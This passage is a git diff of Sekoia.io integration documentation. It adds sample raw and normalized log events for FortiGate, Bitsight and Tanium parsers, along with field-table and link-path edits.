@@ -2745,6 +2934,77 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "traffic_forward.CEF-4.json" + + ```json + + { + "message": "CEF:0|Fortinet|Fortigate|v7.2.8|00013|traffic:forward client-rst|3|deviceExternalId=FGTEXAMPLE subtype=forward FTNTFGTlevel=notice FTNTFGTvd=root src=1.2.3.4 shost=EX1234 spt=59020 deviceInboundInterface=LAN-EX-SRV FTNTFGTsrcintfrole=lan dst=5.6.7.8 dpt=65359 deviceOutboundInterface=CASio-1_0 FTNTFGTdstintfrole=wan FTNTFGTsrccountry=Reserved FTNTFGTdstcountry=Reserved externalId=26368100 proto=6 act=client-rst FTNTFGTpolicyid=353 FTNTFGTpolicytype=policy FTNTFGTpoluuid=2967ec4c-c4d7-51ed-30a5-720dc6023629 FTNTFGTpolicyname=AD-CASio_TO_DC app=tcp/65359 FTNTFGTtrandisp=noop FTNTFGTduration=175 out=3608 in=2571 FTNTFGTsentpkt=15 FTNTFGTrcvdpkt=11 FTNTFGTvpntype=ipsecvpn FTNTFGTvwlid=4 FTNTFGTvwlquality=Seq_num(1 CASIio-1_0), alive, selected FTNTFGTvwlname=TO_JOE FTNTFGTappcat=unscanned FTNTFGTpsrcport=58624 FTNTFGTpdstport=135 FTNTFGTsentdelta=80 FTNTFGTrcvddelta=2519 FTNTFGTsrchwvendor=VMware FTNTFGTosname=Windows FTNTFGTsrcswversion=10 FTNTFGTunauthuser=srvc_forti-sso FTNTFGTunauthusersource=kerberos FTNTFGTmastersrcmac=00:11:22:33:44:55 FTNTFGTsrcmac=00:11:22:33:44:55 FTNTFGTsrcserver=0\n", + "event": { + "action": "client-rst", + "category": "traffic", + "code": "00013", + "dataset": "traffic:forward", + "outcome": "success" + }, + "action": { + "name": "client-rst", + "outcome": "success", + "target": "network-traffic", + "type": "forward" + }, + "destination": { + "address": "5.6.7.8", + "bytes": 2571, + "ip": "5.6.7.8", + "port": 65359 + }, + "log": { + "level": "notice" + }, + "network": { + "application": "tcp/65359", + "bytes": 6179, + "protocol": "tcp/65359", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "CASio-1_0" + } + }, + "ingress": { + "interface": { + "name": "LAN-EX-SRV" + } + }, + "type": "Fortigate", + "vendor": "Fortinet", + "version": 
"v7.2.8" + }, + "related": { + "hosts": [ + "EX1234" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "EX1234", + "bytes": 3608, + "domain": "EX1234", + "ip": "1.2.3.4", + "packets": 15, + "port": 59020 + } + } + + ``` + + === "traffic_forward.CEF.json" ```json @@ -2766,7 +3026,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "3.3.3.3", - "bytes": 398, + "bytes": 1605, "domain": "3.3.3.3", "ip": "3.3.3.3", "packets": 5, @@ -2809,7 +3069,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "2.2.2.2", - "bytes": 1605, + "bytes": 398, "domain": "2.2.2.2", "ip": "2.2.2.2", "nat": { @@ -3416,6 +3676,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "test" } + }, + "user": { + "name": "test" } } @@ -3618,6 +3881,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "CN = foo.bar.baz.com" } + }, + "user": { + "name": "CN = foo.bar.baz.com" } } @@ -3682,6 +3948,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "CN = foo.bar.baz.com" } + }, + "user": { + "name": "CN = foo.bar.baz.com" } } @@ -3712,7 +3981,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "185.230.61.185", - "bytes": 96, + "bytes": 0, "domain": "ambrishsriv.wixsite.com", "ip": "185.230.61.185", "port": 80, @@ -3763,7 +4032,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "10.1.100.11", - "bytes": 0, + "bytes": 96, "ip": "10.1.100.11", "port": 59194 }, 
@@ -3838,6 +4107,7 @@ The following table lists the fields that are extracted, normalized under the EC |`log.level` | `keyword` | Log level of the log event. | |`network.application` | `keyword` | Application level protocol name. | |`network.bytes` | `long` | Total bytes transferred in both directions. | +|`network.forwarded_ip` | `ip` | Host IP address when the source IP address is the proxy. | |`network.protocol` | `keyword` | Application protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`observer.egress.interface.name` | `keyword` | Interface name | diff --git a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md index 9d6698a476..fee16049c2 100644 --- a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md +++ b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md @@ -172,6 +172,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "editpolicy" + + ``` + time=11:36:13 devname="PC-01-OS1" devid="XXXXXXXXXXXX" eventtime=1721727373453168766 tz="+0200" logid="010000000" type="event" subtype="system" level="information" vd="AAAA-AA" logdesc="Object attribute configured" user="username" ui="GUI(1.0.0.0)" action="Edit" cfgtid=111111111 uuid="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx" cfgpath="firewall.policy" cfgobj="756" cfgattr="service[svc-win->svc-repo-linux-port]" msg="Edit firewall.policy 756" + ``` + + + === "email-spamfilter" ``` 
@@ -196,6 +204,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "forwadedfor" + + ``` + time=10:59:48 devname="FW-001" devid="xxxxxxxxxx" eventtime=1720429188081127405 tz="+0200" logid="0000000" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" policyid=00000 poluuid="xxxxxx-xxxx-xxxx-xxxxxx" policytype="policy" sessionid=111111111 srcip=11.0.0.0 srcport=1000 srccountry="France" srcintf="aaaaaaaaa" srcintfrole="wan" srcuuid="xxxxxx-xxxx-xxxx-xxxxxxxxxxx" dstip=10.0.0.1 dstport=80 dstcountry="Reserved" dstintf="aaaaaaaa" dstintfrole="lan" dstuuid="xxxxxxx-xxxx-xxxx-xxxxxxxxxxxx" proto=6 service="HTTP" hostname="sekoia.io" forwardedfor="1.2.3.4" profile="monitor-all" action="passthrough" reqtype="direct" url="http://sekoia.io/" sentbyte=270 rcvdbyte=0 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=51 catdesc="Government and Legal Organizations" + ``` + + + === "hostname" ``` 
@@ -293,6 +309,15 @@ In this section, you will find examples of raw logs as generated natively by the +=== "traffic_forward" + + ``` + CEF:0|Fortinet|Fortigate|v7.2.8|00013|traffic:forward client-rst|3|deviceExternalId=FGTEXAMPLE subtype=forward FTNTFGTlevel=notice FTNTFGTvd=root src=1.2.3.4 shost=EX1234 spt=59020 deviceInboundInterface=LAN-EX-SRV FTNTFGTsrcintfrole=lan dst=5.6.7.8 dpt=65359 deviceOutboundInterface=CASio-1_0 FTNTFGTdstintfrole=wan FTNTFGTsrccountry=Reserved FTNTFGTdstcountry=Reserved externalId=26368100 proto=6 act=client-rst FTNTFGTpolicyid=353 FTNTFGTpolicytype=policy FTNTFGTpoluuid=2967ec4c-c4d7-51ed-30a5-720dc6023629 FTNTFGTpolicyname=AD-CASio_TO_DC app=tcp/65359 FTNTFGTtrandisp=noop FTNTFGTduration=175 out=3608 in=2571 FTNTFGTsentpkt=15 FTNTFGTrcvdpkt=11 FTNTFGTvpntype=ipsecvpn FTNTFGTvwlid=4 FTNTFGTvwlquality=Seq_num(1 CASIio-1_0), alive, selected FTNTFGTvwlname=TO_JOE FTNTFGTappcat=unscanned FTNTFGTpsrcport=58624 FTNTFGTpdstport=135 FTNTFGTsentdelta=80 FTNTFGTrcvddelta=2519 FTNTFGTsrchwvendor=VMware FTNTFGTosname=Windows FTNTFGTsrcswversion=10 FTNTFGTunauthuser=srvc_forti-sso FTNTFGTunauthusersource=kerberos FTNTFGTmastersrcmac=00:11:22:33:44:55 FTNTFGTsrcmac=00:11:22:33:44:55 FTNTFGTsrcserver=0 + + ``` + + + === "traffic_forward" ``` diff --git a/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md index 3e47b08fb6..8ed58fee42 100644 --- a/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md +++ b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. 
@@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_1.json" @@ -327,7 +326,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -357,3 +356,6 @@ The following table lists the fields that are extracted, normalized under the EC |`vulnerability.score.base` | `float` | Vulnerability Base score. | |`vulnerability.severity` | `keyword` | Severity of the vulnerability. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Bitsight/security-performance-management). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50_sample.md b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50_sample.md new file mode 100644 index 0000000000..6fd26d1361 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50_sample.md 
@@ -0,0 +1,517 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_event_1" + + + ```json + { + "temporary_id": "11111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "modal_data": { + "type": "overridden", + "reason": "Software version in extended support" + }, + "modal_tags": { + "Type": "MS IIS", + "Version": "7.5" + }, + "server": "MS IIS", + "version": "7.5" + }, + "geo_ip_location": "test", + "country": "test country", + "grade": "BAD", + "observed_ips": [ + "1.2.3.4" + ], + "port_list": [ + 80, + 81, + 8443, + 8880 + ], + "remediations": [ + { + "message": "Software version in extended support", + "help_text": "The software version is outside mainstream support and is currently in extended support.", + "remediation_tip": "Ensure the latest version of the software is installed. See supported versions." 
+ } + ], + "sample_timestamp": "2024-06-29T21:02:18Z", + "dest_port": 80, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2023-10-04", + "searchable_details": "Software version in extended support,MS IIS,7.5" + }, + "evidence_key": "1.2.3.4", + "first_seen": "2023-10-04", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "server_software", + "risk_vector_label": "Server Software", + "rolledup_observation_id": "11111111111", + "severity": 8.0, + "severity_category": "material", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": "User from Test, Inc. said: \"Test assignments\" at 2023-11-28 12:27 UTC", + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "critical", + "importance": 0.49, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_2" + + + ```json + { + "temporary_id": "11111111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "message": "Detected service: HTTP", + "CPE": [ + "a:amazon:amazon_cloudfront" + ], + "Tags": [], + "Product": "CloudFront httpd", + "Title": "ERROR: The request could not be satisfied", + "transport": "tcp", + "Status": "HTTP/1.1 400 Bad Request", + "Server": "CloudFront" + }, + "final_location": "http://1.2.3.4:12/", + "geo_ip_location": "Location", + "country": "Country", + "grade": "NEUTRAL", + "remediations": [ + { + "message": "Detected service: HTTP", + "help_text": "This port was observed running HTTP, which used for sending and receiving Internet traffic.", + "remediation_tip": "" + } + ], + "sample_timestamp": 
"2024-06-29T08:37:25Z", + "dest_port": 443, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2024-02-13", + "searchable_details": "Detected service: HTTP,tcp,CloudFront httpd" + }, + "evidence_key": "143.204.213.175:443", + "first_seen": "2024-02-13", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "open_ports", + "risk_vector_label": "Open Ports", + "rolledup_observation_id": "1222222222222", + "severity": 1.0, + "severity_category": "minor", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": null, + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "1111111111111111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0.0, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_3" + + + ```json + { + "temporary_id": "11111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "message": "Allows insecure protocol: TLSv1.0, Allows insecure protocol: TLSv1.1", + "certchain": [ + { + "dnsName": [ + "*.test.test", + "test.test" + ], + "endDate": "2025-05-15 23:59:59", + "issuerName": "C=TestC,O=TestO,CN=TestCN RSA Domain Validation Secure Server CA 3", + "keyAlgorithm": "RSA", + "keyLength": 2048, + "serialNumber": "111111111111111111111111", + "signatureAlgorithm": "SHA384WITHRSA", + "startDate": "2024-05-07 00:00:00", + "subjectName": "CN=*.test.test" + }, + { + "dnsName": [], + "endDate": "2033-08-01 23:59:59", + "issuerName": "C=TestC,ST=TestST,L=TestL,O=TestO,CN=TestCN RSA Certification Authority", + "keyAlgorithm": "RSA", + "keyLength": 3072, + "serialNumber": 
"1111111111111111111111111111", + "signatureAlgorithm": "SHA384WITHRSA", + "startDate": "2023-08-02 00:00:00", + "subjectName": "C=TestC,O=TestO,CN=TestCN RSA Domain Validation Secure Server CA 3" + } + ] + }, + "final_location": "https://1.2.3.4/", + "geo_ip_location": "Test", + "country": "Test country", + "grade": "BAD", + "observed_ips": [ + "1.2.3.4:443" + ], + "remediations": [ + { + "message": "Allows insecure protocol: TLSv1.0", + "help_text": "TLS version 1.0 has been deprecated.", + "remediation_tip": "Disable TLS 1.0. See our guide for remediating TLS/SSL Configuration findings." + }, + { + "message": "Allows insecure protocol: TLSv1.1", + "help_text": "TLS version 1.1 has been deprecated.", + "remediation_tip": "Disable TLS 1.1. See our guide on verifying TLS is disabled." + } + ], + "sample_timestamp": "2024-06-29T00:49:11Z", + "dest_port": 443, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2024-06-20", + "searchable_details": "test details" + }, + "evidence_key": "18.134.200.62:443", + "first_seen": "2024-06-20", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "ssl_configurations", + "risk_vector_label": "SSL Configurations", + "rolledup_observation_id": "122222222222222222", + "severity": 10.0, + "severity_category": "severe", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": null, + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "11111111111111111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0.0, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_4" + + + ```json + { + "temporary_id": "11111111111111111111111111111111", + 
"affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "message": "Detected service: HTTPS", + "CPE": [ + "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*" + ], + "Tags": [], + "Title": "Service", + "transport": "tcp", + "Status": "HTTP/1.1 200 OK", + "Server": "Microsoft-HTTPAPI/2.0" + }, + "final_location": "https://1.2.3.4:8086/", + "geo_ip_location": "Test", + "country": "TestCountry", + "grade": "GOOD", + "remediations": [ + { + "message": "Detected service: HTTPS", + "help_text": "This port was observed running Hypertext Transfer Protocol Secure (HTTPS), which is used for sending and receiving secure internet traffic.", + "remediation_tip": "" + } + ], + "sample_timestamp": "2024-06-29T11:52:03Z", + "dest_port": 8086, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2023-05-13", + "searchable_details": "Detected service: HTTPS,tcp" + }, + "evidence_key": "1.2.3.4:8086", + "first_seen": "2023-05-13", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "open_ports", + "risk_vector_label": "Open Ports", + "rolledup_observation_id": "1123123123123123123", + "severity": 1.0, + "severity_category": "minor", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": null, + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "1111111111111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0.0, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_domain" + + + ```json + { + "temporary_id": "1111111111111111111111111111111111111111111111111111&", + "affects_rating": false, + "asset": { + "asset": "1.2.3.4", + 
"identifier": null, + "category": "low", + "importance": 0, + "is_ip": true, + "asset_type": "Domain" + }, + "vulnerability": { + "name": "CVE-2014-3566", + "alias": "POODLE", + "display_name": "POODLE", + "description": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3.", + "confidence": "HIGH", + "cvss": { + "base": 3.4 + }, + "severity": "Minor" + }, + "company_uuid": "399e55d6-eab2-438d-84cd-fb0d0b967fcd", + "details": { + "cvss": { + "base": [ + 3.4 + ] + }, + "check_pass": "", + "diligence_annotations": { + "remediation_dates": [ + { + "first": "2022-08-14 21:04:42", + "last": "2022-08-14 21:04:42" + } + ], + "is_remediated": true + }, + "remediations": [ + { + "message": "CVE-2014-3566 (POODLE)", + "help_text": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3." 
+ } + ], + "rollup_end_date": "2022-08-14", + "rollup_start_date": "2022-08-14", + "searchable_details": "CVE-2014-3566" + }, + "evidence_key": "1.2.3.4:443", + "first_seen": "2022-08-14", + "last_seen": "2022-08-14", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "patching_cadence", + "risk_vector_label": "Patching Cadence", + "rolledup_observation_id": "ZxFoXXsV3gvZS0t0oTmxcA==", + "severity": 4.3, + "severity_category": "moderate", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": "1 day", + "comments": null, + "remaining_decay": null, + "remediated": true, + "impacts_risk_vector_details": "LIFETIME_EXPIRED" + } + ``` + + + +=== "test_event_ip" + + + ```json + { + "temporary_id": "1111111111111111111111111111111111111111111111111111&", + "affects_rating": false, + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0, + "is_ip": true, + "asset_type": "IP" + }, + "vulnerability": { + "name": "CVE-2014-3566", + "alias": "POODLE", + "display_name": "POODLE", + "description": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. 
Disable SSLv3 support on those servers, as described in Disable SSLv3.", + "confidence": "HIGH", + "cvss": { + "base": 3.4 + }, + "severity": "Minor" + }, + "company_uuid": "399e55d6-eab2-438d-84cd-fb0d0b967fcd", + "details": { + "cvss": { + "base": [ + 3.4 + ] + }, + "check_pass": "", + "diligence_annotations": { + "remediation_dates": [ + { + "first": "2022-08-14 21:04:42", + "last": "2022-08-14 21:04:42" + } + ], + "is_remediated": true + }, + "remediations": [ + { + "message": "CVE-2014-3566 (POODLE)", + "help_text": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3." + } + ], + "rollup_end_date": "2022-08-14", + "rollup_start_date": "2022-08-14", + "searchable_details": "CVE-2014-3566" + }, + "evidence_key": "1.2.3.4:443", + "first_seen": "2022-08-14", + "last_seen": "2022-08-14", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "patching_cadence", + "risk_vector_label": "Patching Cadence", + "rolledup_observation_id": "ZxFoXXsV3gvZS0t0oTmxcA==", + "severity": 4.3, + "severity_category": "moderate", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": "1 day", + "comments": null, + "remaining_decay": null, + "remediated": true, + "impacts_risk_vector_details": "LIFETIME_EXPIRED" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md b/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md index ee9698208e..b8e1dc093f 100644 
--- a/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md +++ b/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_01.json" diff --git a/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md b/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md index 7199d5bf48..7b953b1238 100644 --- a/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md +++ b/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_access.json" diff --git a/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md b/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md index 83dff5cda9..acaa7e89b4 100644 --- a/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md +++ b/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_arp_src_ip.json" diff --git a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md index 3b657d60c1..f1855bfff0 100644 --- a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md +++ b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md 
@@ -26,10 +26,250 @@ The following table lists the data source offered by this integration. +In details, the following table denotes the type of events produced by this integration. +| Name | Values | +| ---- | ------ | +| Kind | `event` | +| Category | `file`, `network`, `process`, `registry` | +| Type | `allowed`, `change`, `creation`, `deletion`, `end`, `info`, `start` | +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "tanium_file_open.json" + + ```json + + { + "message": "{\"event\":\"file_open\",\"hostname\":\"2256269043\",\"host\":\"172.16.2.1\",\"fields\":{\"tanium_process_id\":\"-6966335309415971179\",\"read_flag\":true,\"full_path\":\"/var/lib/rrdcached/db/pve2-vm/115\",\"process__login__user_id\":4294967295,\"process__login__user_name\":null,\"process__pid\":1685,\"process__user__group\":\"root\",\"process__file__full_path\":\"/usr/bin/rrdcached\",\"process__user__name\":\"root\"}}", + "event": { + "action": "file-open", + "category": [ + "file" + ], + "kind": "event", + "type": [ + "info" + ] + }, + "file": { + "directory": "/var/lib/rrdcached/db/pve2-vm", + "name": "115", + "path": "/var/lib/rrdcached/db/pve2-vm/115" + }, + "group": { + "name": "root" + }, + "host": { + "hostname": "2256269043", + "ip": [ + "172.16.2.1" + ], + "name": "2256269043" + }, + "observer": { + "name": "2256269043", + "product": "XEM", + "type": "sensor", + "vendor": "Tanium" + }, + "process": { + "executable": "/usr/bin/rrdcached", + "name": "rrdcached", + "pid": 1685 
+ }, + "related": { + "hosts": [ + "2256269043" + ], + "ip": [ + "172.16.2.1" + ] + }, + "user": { + "id": "4294967295" + } + } + + ``` + + +=== "tanium_network_connect.json" + + ```json + + { + "message": "{\"event\":\"network_connect\",\"hostname\":\"2421864415\",\"host\":\"172.16.2.1\",\"fields\":{\"remote_port\":80,\"process__login__user_name\":null,\"process__pid\":2540,\"process__user__group\":\"NT AUTHORITY\",\"local_ip\":\"172.16.4.1\",\"local_port\":53671,\"process__file__full_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"tanium_process_id\":\"-4314545011392247632\",\"process__login__user_id\":0,\"remote_ip\":\"184.25.50.65\",\"process__user__name\":\"NETWORK SERVICE\"}}", + "event": { + "category": [ + "network" + ], + "kind": "event", + "type": [ + "start" + ] + }, + "destination": { + "address": "184.25.50.65", + "ip": "184.25.50.65", + "port": 80 + }, + "group": { + "name": "NT AUTHORITY" + }, + "host": { + "hostname": "2421864415", + "ip": [ + "172.16.2.1" + ], + "name": "2421864415" + }, + "observer": { + "name": "2421864415", + "product": "XEM", + "type": "sensor", + "vendor": "Tanium" + }, + "process": { + "executable": "C:\\Windows\\System32\\svchost.exe", + "name": "svchost.exe", + "pid": 2540 + }, + "related": { + "hosts": [ + "2421864415" + ], + "ip": [ + "172.16.2.1", + "172.16.4.1", + "184.25.50.65" + ] + }, + "source": { + "address": "172.16.4.1", + "ip": "172.16.4.1", + 